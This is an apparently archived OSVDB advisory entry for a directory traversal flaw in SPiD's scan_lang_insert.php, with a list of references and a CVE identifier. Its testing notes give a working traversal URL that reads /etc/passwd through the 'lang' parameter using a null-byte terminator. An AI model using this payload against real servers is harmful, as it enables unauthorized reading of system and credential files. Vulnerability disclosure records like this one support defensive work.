SPiD scan_lang_insert.php lang Variable Traversal Arbitrary File Access

2006-02-25T09:02:34
ID OSVDB:23522
Type osvdb
Reporter OSVDB
Modified 2006-02-25T09:02:34

Description

Manual Testing Notes

http://[target]/spiddir/scan_lang_insert.php?lang=../../../../../../../../etc/passwd%00

References:

Vendor URL: http://spid.adnx.net/ Secunia Advisory ID:19033 Other Advisory URL: http://www.nsag.ru/vuln/955.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0471.html FrSIRT Advisory: ADV-2006-0766 CVE-2006-0976 Bugtraq ID: 16822